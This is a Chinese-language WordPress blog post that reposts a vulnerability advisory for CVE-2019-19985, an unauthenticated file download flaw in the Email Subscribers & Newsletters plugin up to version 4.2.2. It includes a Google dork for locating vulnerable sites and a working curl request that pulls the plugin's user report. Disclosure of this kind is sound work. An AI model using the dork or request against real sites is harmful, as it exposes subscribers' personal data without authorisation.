WordPress极简博客 WordPress极简博客
  • 新鲜事
  • 战疫情
  • UI素材
    • UI素材
    • 电商/节日
    • PPT
      • 节日庆典
      • 工作汇报
      • 商业计划书
    • word
      • 简历竞聘
      • 合同/公文
  • 创客头条
    • 音乐分享
    • 初创文章
    • 极客头条
    • 生活趣事
    • 生活日记
    • 防骗指南
  • 编程教学
    • API日记
    • Linux安全栏目
      • Linux运维安全汇总
      • DDOS攻击防护
      • XSS攻击防护
      • SQL安全防护
    • Python技术栏目
      • Python基础入门
      • Python基础结构
    • WordPress技术栏目
      • WP主题
      • WordPress技术教程
      • RIPRO主题美化
    • WordPress漏洞发布
    • 技术教程汇总
    • 严选源码
  • 专题
  • 基友
  • 隐私
  • 注册
    登录
立即登录
  • 首页
  • 云优化
  • 新疫情
  • 新鲜事
    • 热文
    • 极客
    • 生活
  • 技术篇
    • WP主题
    • 技术教程
    • Python入门
    • Python基础
  • 专题篇
  • 友链君
首页 WordPress漏洞发布 WordPress Email Subscribers & Newsletters 信息泄露漏洞

WordPress Email Subscribers & Newsletters 信息泄露漏洞

夏柔 8月 9, 2020
漏洞ID12728漏洞类型信息泄露
发布时间2020-08-07更新时间2020-08-09
WordPress Email Subscribers & Newsletters 信息泄露漏洞-WordPress极简博客CVE编号CVE-2019-19985WordPress Email Subscribers & Newsletters 信息泄露漏洞-WordPress极简博客CNNVD-IDCNNVD-201912-1109
漏洞平台N/ACVSS评分N/A
漏洞来源
cxsecurity
下载
官方跳转
|漏洞详情

WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。Email Subscribers & Newsletters是使用在其中的一个电子邮件订阅和新闻通讯插件。 WordPress Email Subscribers & Newsletters 4.2.3之前版本中存在安全漏洞。攻击者可利用该漏洞未经身份验证便可下载文件,造成信息泄露。

|漏洞EXP
# Exploit Title: WordPress Plugin Email Subscribers & Newsletters 4.2.2 - Unauthenticated File Download
# Google Dork: "Stable tag" inurl:wp-content/plugins/email-subscribers/readme.txt
# Date: 2020-07-20
# Exploit Author: KBA@SOGETI_ESEC
# Vendor Homepage: https://www.icegram.com/email-subscribers/
# Software Link: https://pluginarchive.com/wordpress/email-subscribers/v/4-2-2
# Version: <= 4.2.2
# Tested on: Email Subscribers & Newsletters 4.2.2
# CVE : CVE-2019-19985

 ################################################################################################
 #             ___         ___         ___         ___      ___                                 #
 #            /\  \       /\  \       /\  \       /\  \    /\  \        ___                     #
 #           /::\  \     /::\  \     /::\  \     /::\  \   \:\  \      /\  \                    #
 #          /:/\ \  \   /:/\:\  \   /:/\:\  \   /:/\:\  \   \:\  \     \:\  \                   #
 #         _\:\~\ \  \ /:/  \:\  \ /:/  \:\  \ /::\~\:\  \  /::\  \    /::\__\                  #
 #        /\ \:\ \ \__/:/__/ \:\__/:/__/_\:\__/:/\:\ \:\__\/:/\:\__\__/:/\/__/                  #
 #        \:\ \:\ \/__\:\  \ /:/  \:\  /\ \/__\:\~\:\ \/__/:/  \/__/\/:/  /                     #
 #         \:\ \:\__\  \:\  /:/  / \:\ \:\__\  \:\ \:\__\/:/  /    \::/__/                      #
 #          \:\/:/  /   \:\/:/  /   \:\/:/  /   \:\ \/__/\/__/      \:\__\                      #
 #           \::/  /     \::/  /     \::/  /     \:\__\              \/__/                      #
 #            \/__/       \/__/       \/__/       \/__/                                         #
 #                                                 ___         ___         ___         ___      #
 #                                                /\  \       /\  \       /\  \       /\  \     #
 #                                               /::\  \     /::\  \     /::\  \     /::\  \    #
 #                EXPLOIT                       /:/\:\  \   /:/\ \  \   /:/\:\  \   /:/\:\  \   #
 # Email Subscribers & Newsletters <= 4.2.2    /::\~\:\  \ _\:\~\ \  \ /::\~\:\  \ /:/  \:\  \  #
 #   Unauthenticated File Download            /:/\:\ \:\__/\ \:\ \ \__/:/\:\ \:\__/:/__/ \:\__\ #
 #                                            \:\~\:\ \/__\:\ \:\ \/__\:\~\:\ \/__\:\  \  \/__/ #
 #                                             \:\ \:\__\  \:\ \:\__\  \:\ \:\__\  \:\  \       #
 #                                              \:\ \/__/   \:\/:/  /   \:\ \/__/   \:\  \      #
 #                                               \:\__\      \::/  /     \:\__\      \:\__\     #
 #                                    KBAZ        \/__/       \/__/       \/__/       \/__/     #
 #                                                                                              #
 #                                                                                              #
 ################################################################################################


curl [BASE_URL]'/wp-admin/admin.php?page=download_report&report=users&status=all'
EXAMPLE: curl 'http://127.0.0.1/wp-admin/admin.php?page=download_report&report=users&status=all'
|参考资料
wpvulndb
下载
官方跳转
MISC
下载
官方跳转
NVD
下载
官方跳转
#wordpress#信息泄漏漏洞#泄露
1
J2dcg1.png
猜你喜欢
  • WordPress在文章加点隐藏内容
  • 给网站的标题添加点色彩
  • 网站访问慢需要优化?看这一篇就够了!
  • WordPress去除index.php的方法
  • WordPress NAB Transact WooCommerce 2.1.0 Payment Bypass
  • WordPress quiz-master-next 安全漏洞
  • 关于WordPress 5.5 回复按钮失效问题回复
  • Nova Lite theme 跨站脚本漏洞
  • WordPress5.5版本正式发布
  • WordPress如何在多站点下判断是否开放用户注册
23 10月, 2019
RIpro主题导航头像下拉菜单美化
夏柔
站长
夏山如碧 - 怀柔天下
1725
文章
25
评论
58145K
获赞
版权声明

文章采用创作共用版权 CC BY-NC-ND/2.5/CN 许可协议,与本站观点无关。

如果您认为本文侵犯了您的版权信息,请与我们联系修正或删除。
投诉邮箱wpsite@aliyun.com

栏目推荐
Python基础入门33
WordPress技术教程267
前沿技术情报所22
城市创新——新消费11
最近有哪些不可错过的热文23
程序员的养生之道0
节
春
  • 新鲜事
  • 疫情实况
  • UI素材
  • 技术教程
  • 音乐分享
  • 专题
  • 友情
  • 隐私
  • 云优化
Copyright © 2019-2025 WordPress极简博客. Designed by 夏柔. 辽公网安备21010502000474号 辽ICP备19017037号-2